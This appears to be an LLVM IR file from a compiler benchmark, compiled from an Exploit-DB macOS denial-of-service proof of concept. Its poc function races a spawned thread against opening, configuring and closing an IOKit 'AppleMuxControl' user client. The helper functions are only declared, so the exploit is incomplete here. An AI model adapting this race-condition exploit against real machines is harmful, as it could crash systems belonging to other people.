; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39922.c_poc.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39922.c_poc.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@lock = common dso_local global i32 0, align 4
@thread_func = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [16 x i8] c"AppleMuxControl\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @poc() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = call i32 @OSSpinLockLock(i32* @lock)
  %4 = load i32, i32* @thread_func, align 4
  %5 = call i32 @pthread_create(i32* %1, i32* null, i32 %4, i32* null)
  %6 = call i32 @get_user_client(i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str, i64 0, i64 0), i32 0)
  store i32 %6, i32* %2, align 4
  %7 = load i32, i32* %2, align 4
  %8 = call i32 @set_params(i32 %7)
  %9 = call i32 @OSSpinLockUnlock(i32* @lock)
  %10 = load i32, i32* %2, align 4
  %11 = call i32 @IOServiceClose(i32 %10)
  %12 = load i32, i32* %1, align 4
  %13 = call i32 @pthread_join(i32 %12, i32* null)
  ret void
}

declare dso_local i32 @OSSpinLockLock(i32*) #1

declare !callback !2 dso_local i32 @pthread_create(i32*, i32*, i32, i32*) #1

declare dso_local i32 @get_user_client(i8*, i32) #1

declare dso_local i32 @set_params(i32) #1

declare dso_local i32 @OSSpinLockUnlock(i32*) #1

declare dso_local i32 @IOServiceClose(i32) #1

declare dso_local i32 @pthread_join(i32, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
!2 = !{!3}
!3 = !{i64 2, i64 3, i1 false}
